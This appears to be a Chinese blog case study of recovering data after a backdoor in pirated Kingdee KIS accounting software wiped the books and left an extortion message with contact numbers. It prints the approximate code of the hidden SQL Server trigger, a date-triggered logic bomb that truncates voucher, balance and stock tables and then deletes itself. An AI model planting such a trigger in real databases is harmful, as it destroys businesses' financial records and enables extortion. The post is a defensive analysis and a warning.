金蝶KIS專業版替換SXS.dll 遭後門清空數據被修改為【恢複數據聯繫QQ 735330197,2251434429】解決方法 修複工具。

来源:http://www.cnblogs.com/smsql/archive/2017/01/15/6287990.html
-Advertisement-
Play Games

金蝶KIS專業版 替換SXS.dll 遭後門清空數據(憑證被改為:恢複數據聯繫QQ 735330197,2251434429)恢復解決方法。 【客戶名稱】:山東青島福隆發紡織品有限公司 【軟體名稱】:金蝶KIS專業版12.2 【資料庫版本】:MS SQL server 2000 【資料庫大小】:1G ...


金蝶KIS專業版 替換SXS.dll 遭後門清空數據(憑證被改為:恢複數據聯繫QQ 735330197,2251434429)恢復解決方法。

【客戶名稱】:山東青島福隆發紡織品有限公司

【軟體名稱】:金蝶KIS專業版12.2

【資料庫版本】:MS SQL server 2000  【資料庫大小】:1GB  。

【問題描述】:客戶貪圖便宜,使用破解版財務軟體,破解者破解後內藏了後門,清空所有數據的觸發器。用了1年時間後,後門觸發器被激活,刪除了所有 科目餘額表、存貨餘額、存貨往來明細賬、修改了所有 總賬憑證、業務憑證、會計科目、內容為:恢複數據聯繫QQ 735330197,2251434429,使資料庫全部癱瘓,所有賬目混亂。沒有備份,急需年度上報,急需恢復。

【問題分析】:接到電話後,客戶發來遭後門修改資料庫文件,立即組織對資料庫分析工作,發現資料庫內有一個後門觸發器 t_log_autoNumbe ,大致代碼內容為:

if (@FGLCurrYear=2014 and @FGLCurrPeriod>=1) or (@FICCurrYear=2014 and @FICCurrPeriod>=1)

begin
if (@Flogdays>=15)   
begin
TRUNCATE TABLE t_voucherEntry  --刪除總賬憑證
TRUNCATE TABLE t_balance --刪除科目餘額表
if @FVersion='8.0'  --版本大於8.0
TRUNCATE TABLE icstockbillEntry --刪除存貨出入庫明細賬
else
TRUNCATE TABLE t_cc_stockbillEntry --刪除庫存明細賬
drop trigger t_log_AutoNumber
end
end
GO

通過大致代碼內容,得知後門刪除了哪些東西,用了什麼方法!客戶資料庫文件是MSDE 為簡單模型,沒有日誌記錄,只能在現有MDF文件基礎上,進行恢復!通過我們自主研發的提取工具,進行相關刪除數據,修改數據反後門操作,得到憑證讀寫日誌文件,科目餘額表等於表,通過編寫對應的分離程式,進行憑證拼裝,成功恢復後門修改數據95%。

【恢復結果】:發回給客戶測試驗收,反饋數據基本正確,能恢復這個程度,客戶很滿意!得到客戶的極大好評。

【溫馨提示】:使用破解版軟體,危害很大。居心不良的破解者,可能會留下後門木馬,刪除修改數據,敲詐錢財。如果商用,請使用正版軟體!

【數據工程師】尹軍   電話/微信/QQ:18302650920   歡迎來人來電咨詢洽談數據恢復。

1、系統崩潰只剩下Sqlserver數據文件的情況下的恢復.即無日誌文件或者日誌文件損壞情況下的恢復 2、SqlServer數據文件內部存在壞頁情況下的恢復。 3、在Sql Server2000、SqlServer2005、SQL2008運行在簡單日誌模式、完全日誌模式或者大容量日誌記錄模式下數據被誤(drop、delete、truncate)刪除表恢復,updata後的數據恢復等 4、Sql Serve文件無法附加情況下的數據恢復。 5、Sql Server資料庫被標記為可疑,不可用等情況. 6、Sql Server2000、SqlServer2005、SQL2008資料庫SysObjects等系統表損壞無法正常應用情況下的恢復. 7、Sql Server資料庫只有數據文件 沒有任何日誌的情況下的恢復. 8、Sql Server數據文件被誤刪除情況下的恢復. 9、Sql Server2000、Sql Server2005、SQL2008資料庫master資料庫損壞而無法正常運行情況下的恢復。 10、Sql server還原時報一致性錯誤,錯誤823等情況下的數據恢復,各種錯誤提示的資料庫文件修複 11、可恢復因硬碟壞道造成的資料庫損壞 12、可修複日誌收縮或突然斷電後的資料庫 13、可恢復多個關係型資料庫 14、可恢復SQL資料庫BKF備份文件以及BAK文件 15、磁碟陣列上的SQL SERVER資料庫被誤格式化等情況下的資料庫恢復 16、可進行SQL SERVER資料庫格式化,誤刪除,所有市面恢復軟體無法恢復情況下的恢復,即碎片級資料庫提取恢復。 17、可恢復Shade勒索病毒文件中毒被加密,資料庫文件反敲詐服務。
您的分享是我們最大的動力!

-Advertisement-
Play Games
更多相關文章
  • 動態視圖 基表 GV$ACCESS x$ksuses,x$kglob,x$kgldp,x$kgllk GV$ACTIVE_INSTANCES x$ksimsi GV$ACTIVE_SESS_POOL_MTH x$kgskasp GV$AQ1 X$KWQSI GV$ACCESS x$ksuses,x$ ...
  • Resource Governor的出現,解決了在一臺SQL Server實例上,管理多用戶工作負載和資源隔離的需求,它允許管理員限制系統處理Requsts時所耗費的CPU 和 Memory資源的數量,在一定程度上,限制和隔離了runaway查詢。對於SQL Server 2012,用戶能夠基於工作 ...
  • 後臺資料庫操作某個表時處於假死狀態,可能該表被某個用戶鎖定,導致其他用戶無法繼續操作, 如下是解決方案和實例。 查被鎖的表,以及用戶 解鎖,釋放SESSION SQL 實例如下: 執行查詢鎖表的sql,得到結果 現在想要sys_dbcfileinfo表被鎖定,如果處於其他用戶一直忘記提交狀態,現在繼 ...
  • Deeplearning 學習記錄,從人工神經網路到捲積神經網路_3_使用tensorflow搭建CNN來分類not_MNIST數據 ...
  • 前言 好長時間沒摸資料庫了,周末在家寫了個報表的存儲過程,一時間對使用存儲過程實現分頁的同時並計算出記錄總數不知道怎麼更好的去實現。按照我們正常的業務邏輯,存儲過程數據首先是分頁,其次接受若幹查詢條件,返回分頁結果集的同時還需要返回記錄總數給客戶端。 我對於這樣一個業務存儲過程總結如下:1、內核層, ...
  • SqlServer創建數據表描述及列描述信息 Intro Q: 為什麼要創建描述信息? A: 滑鼠懸停在對應表和列上時,會出現描述信息,可以提高工作的效率,藉助工具我們根據數據表可以生成Model,可以將描述信息。 添加描述語法 添加描述存儲過程【sp_addextendedproperty】語法 ...
  • 1.增加一列: Alter table 表名 add 列名 varchar2(10); 1.增加一列: Alter table 表名 add 列名 varchar2(10); 2.修改一列: Alter table 表名 modify 列名 varchar2(20); 3.刪除一列: Alter t ...
  • 資料庫版本 SQL SERVER 2012 企業版,版本號:11.0.5582.0 問題場景: 資料庫配置Alwayson環境,同機房2節點同步自動切換+跨機房非同步,在非同步機房中選取同一節點做完整備份和日誌備份,完整備份為COPY_ONLY方式,完整備份從0:35開始至1:40成功結束,日誌備份從0 ...
一周排行
    -Advertisement-
    Play Games
  • 移動開發(一):使用.NET MAUI開發第一個安卓APP 對於工作多年的C#程式員來說,近來想嘗試開發一款安卓APP,考慮了很久最終選擇使用.NET MAUI這個微軟官方的框架來嘗試體驗開發安卓APP,畢竟是使用Visual Studio開發工具,使用起來也比較的順手,結合微軟官方的教程進行了安卓 ...
  • 前言 QuestPDF 是一個開源 .NET 庫,用於生成 PDF 文檔。使用了C# Fluent API方式可簡化開發、減少錯誤並提高工作效率。利用它可以輕鬆生成 PDF 報告、發票、導出文件等。 項目介紹 QuestPDF 是一個革命性的開源 .NET 庫,它徹底改變了我們生成 PDF 文檔的方 ...
  • 項目地址 項目後端地址: https://github.com/ZyPLJ/ZYTteeHole 項目前端頁面地址: ZyPLJ/TreeHoleVue (github.com) https://github.com/ZyPLJ/TreeHoleVue 目前項目測試訪問地址: http://tree ...
  • 話不多說,直接開乾 一.下載 1.官方鏈接下載: https://www.microsoft.com/zh-cn/sql-server/sql-server-downloads 2.在下載目錄中找到下麵這個小的安裝包 SQL2022-SSEI-Dev.exe,運行開始下載SQL server; 二. ...
  • 前言 隨著物聯網(IoT)技術的迅猛發展,MQTT(消息隊列遙測傳輸)協議憑藉其輕量級和高效性,已成為眾多物聯網應用的首選通信標準。 MQTTnet 作為一個高性能的 .NET 開源庫,為 .NET 平臺上的 MQTT 客戶端與伺服器開發提供了強大的支持。 本文將全面介紹 MQTTnet 的核心功能 ...
  • Serilog支持多種接收器用於日誌存儲,增強器用於添加屬性,LogContext管理動態屬性,支持多種輸出格式包括純文本、JSON及ExpressionTemplate。還提供了自定義格式化選項,適用於不同需求。 ...
  • 目錄簡介獲取 HTML 文檔解析 HTML 文檔測試參考文章 簡介 動態內容網站使用 JavaScript 腳本動態檢索和渲染數據,爬取信息時需要模擬瀏覽器行為,否則獲取到的源碼基本是空的。 本文使用的爬取步驟如下: 使用 Selenium 獲取渲染後的 HTML 文檔 使用 HtmlAgility ...
  • 1.前言 什麼是熱更新 游戲或者軟體更新時,無需重新下載客戶端進行安裝,而是在應用程式啟動的情況下,在內部進行資源或者代碼更新 Unity目前常用熱更新解決方案 HybridCLR,Xlua,ILRuntime等 Unity目前常用資源管理解決方案 AssetBundles,Addressable, ...
  • 本文章主要是在C# ASP.NET Core Web API框架實現向手機發送驗證碼簡訊功能。這裡我選擇是一個互億無線簡訊驗證碼平臺,其實像阿裡雲,騰訊雲上面也可以。 首先我們先去 互億無線 https://www.ihuyi.com/api/sms.html 去註冊一個賬號 註冊完成賬號後,它會送 ...
  • 通過以下方式可以高效,並保證數據同步的可靠性 1.API設計 使用RESTful設計,確保API端點明確,並使用適當的HTTP方法(如POST用於創建,PUT用於更新)。 設計清晰的請求和響應模型,以確保客戶端能夠理解預期格式。 2.數據驗證 在伺服器端進行嚴格的數據驗證,確保接收到的數據符合預期格 ...